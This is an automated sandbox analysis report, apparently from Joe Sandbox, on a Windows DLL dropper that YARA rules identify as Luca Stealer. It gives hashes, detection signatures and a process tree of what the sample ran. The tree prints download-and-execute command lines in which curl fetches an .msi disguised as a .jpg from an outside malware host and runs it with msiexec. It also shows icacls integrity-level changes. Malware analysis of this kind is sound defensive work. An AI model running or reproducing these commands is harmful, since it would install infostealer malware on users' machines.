Edit tour
Windows
Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
Overview
General Information
| Sample Name: | SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll |
| Analysis ID: | 756307 |
| MD5: | 977f29431f9233f22f51b3d27e8abc28 |
| SHA1: | 7999931d13db79b25e8660065fbbe5288dc04d7e |
| SHA256: | b875add23dbf8b2942af53c0610c779c4263dacdf69186a3d4c9c09c3ebebdbe |
| Tags: | exe |
| Infos: |  |
 | |
Detection
Luca Stealer
| Score: | 52 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Yara detected Luca Stealer
Queries memory information (via WMI often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Drops PE files
Tries to load missing DLLs
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
loaddll64.exe (PID: 1096 cmdline: loaddll64. exe "C:\Us ers\user\D esktop\Sec uriteInfo. com.Win64. DropperX-g en.15394.3 0671.dll" MD5: C676FC0263EDD17D4CE7D644B8F3FCD6) 
conhost.exe (PID: 68 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 4304 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\Sec uriteInfo. com.Win64. DropperX-g en.15394.3 0671.dll", #1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F) 
rundll32.exe (PID: 6056 cmdline: rundll32.e xe "C:\Use rs\user\De sktop\Secu riteInfo.c om.Win64.D ropperX-ge n.15394.30 671.dll",# 1 MD5: 73C519F050C20580F8A62C849D49215A) - cmd.exe (PID: 6020 cmdline:
cmd /C cur l http://a nydesk10.h ospedagemd esites.ws/ UIServices .jpg -o %t emp%\spclw ow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - curl.exe (PID: 6088 cmdline:
curl http: //anydesk1 0.hospedag emdesites. ws/UIServi ces.jpg -o C:\Users\ user\AppDa ta\Local\T emp\spclwo w78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - cmd.exe (PID: 5180 cmdline:
cmd /C %te mp%\spclwo w78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) 
msiexec.exe (PID: 4792 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \spclwow78 x.msi" MD5: 4767B71A318E201188A0D0A420C8B608) - rundll32.exe (PID: 6000 cmdline:
rundll32.e xe C:\User s\user\Des ktop\Secur iteInfo.co m.Win64.Dr opperX-gen .15394.306 71.dll,xlA utoOpen MD5: 73C519F050C20580F8A62C849D49215A) - cmd.exe (PID: 6012 cmdline:
cmd /C cur l http://a nydesk10.h ospedagemd esites.ws/ UIServices .jpg -o %t emp%\spclw ow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6008 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - curl.exe (PID: 6080 cmdline:
curl http: //anydesk1 0.hospedag emdesites. ws/UIServi ces.jpg -o C:\Users\ user\AppDa ta\Local\T emp\spclwo w78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - cmd.exe (PID: 6096 cmdline:
cmd /C %te mp%\spclwo w78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6128 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - msiexec.exe (PID: 5804 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \spclwow78 x.msi" MD5: 4767B71A318E201188A0D0A420C8B608) - rundll32.exe (PID: 1668 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\Secu riteInfo.c om.Win64.D ropperX-ge n.15394.30 671.dll",x lAutoOpen MD5: 73C519F050C20580F8A62C849D49215A) - cmd.exe (PID: 4696 cmdline:
cmd /C cur l http://a nydesk10.h ospedagemd esites.ws/ UIServices .jpg -o %t emp%\spclw ow78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 4780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - curl.exe (PID: 5272 cmdline:
curl http: //anydesk1 0.hospedag emdesites. ws/UIServi ces.jpg -o C:\Users\ user\AppDa ta\Local\T emp\spclwo w78x.msi MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED) - cmd.exe (PID: 2764 cmdline:
cmd /C %te mp%\spclwo w78x.msi MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 3020 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - msiexec.exe (PID: 1708 cmdline:
"C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \spclwow78 x.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
- msiexec.exe (PID: 3660 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: 4767B71A318E201188A0D0A420C8B608) - msiexec.exe (PID: 5260 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 8954BF1 BAC6ED414A 355FBE2610 97B79 MD5: 12C17B5A5C2A7B97342C362CA467E9A2) - icacls.exe (PID: 1400 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 83846a6a-5 335-49c7-a 64d-321577 1defa9\." /SETINTEGR ITYLEVEL ( CI)(OI)HIG H MD5: FF0D1D4317A44C951240FAE75075D501) - conhost.exe (PID: 5992 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - expand.exe (PID: 4272 cmdline:
"C:\Window s\system32 \EXPAND.EX E" -R file s.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D) - conhost.exe (PID: 2348 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - UIServices.exe (PID: 3560 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\MW-838 46a6a-5335 -49c7-a64d -3215771de fa9\files\ UIServices .exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A) - icacls.exe (PID: 1916 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 83846a6a-5 335-49c7-a 64d-321577 1defa9\." /SETINTEGR ITYLEVEL ( CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501) - conhost.exe (PID: 1772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - msiexec.exe (PID: 5104 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 3860C12 BB15873291 EECD7576AA 6B0CD MD5: 12C17B5A5C2A7B97342C362CA467E9A2) - icacls.exe (PID: 4988 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 41c173f9-8 798-494b-a a19-9db46f 28a6d1\." /SETINTEGR ITYLEVEL ( CI)(OI)HIG H MD5: FF0D1D4317A44C951240FAE75075D501) - conhost.exe (PID: 4964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - expand.exe (PID: 4968 cmdline:
"C:\Window s\system32 \EXPAND.EX E" -R file s.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D) - conhost.exe (PID: 4936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - UIServices.exe (PID: 5736 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\MW-41c 173f9-8798 -494b-aa19 -9db46f28a 6d1\files\ UIServices .exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A) - icacls.exe (PID: 4780 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 41c173f9-8 798-494b-a a19-9db46f 28a6d1\." /SETINTEGR ITYLEVEL ( CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501) - conhost.exe (PID: 1172 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - msiexec.exe (PID: 5396 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 632F0AA 6C1DCAE081 535E1BA9D5 3BDC9 MD5: 12C17B5A5C2A7B97342C362CA467E9A2) - icacls.exe (PID: 5444 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 44114562-6 760-4a4c-9 7c1-6b4491 c709b3\." /SETINTEGR ITYLEVEL ( CI)(OI)HIG H MD5: FF0D1D4317A44C951240FAE75075D501) - conhost.exe (PID: 5324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - expand.exe (PID: 5292 cmdline:
"C:\Window s\system32 \EXPAND.EX E" -R file s.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D) - conhost.exe (PID: 3328 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - UIServices.exe (PID: 3928 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\MW-441 14562-6760 -4a4c-97c1 -6b4491c70 9b3\files\ UIServices .exe" MD5: F65B1FC89A4324BEFDB6F24406BAEF6A) - icacls.exe (PID: 2140 cmdline:
"C:\Window s\system32 \ICACLS.EX E" "C:\Use rs\user\Ap pData\Loca l\Temp\MW- 44114562-6 760-4a4c-9 7c1-6b4491 c709b3\." /SETINTEGR ITYLEVEL ( CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501) - conhost.exe (PID: 1000 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | ||
| JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security | ||
| JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
⊘No Sigma rule has matched
⊘No Snort rule has matched
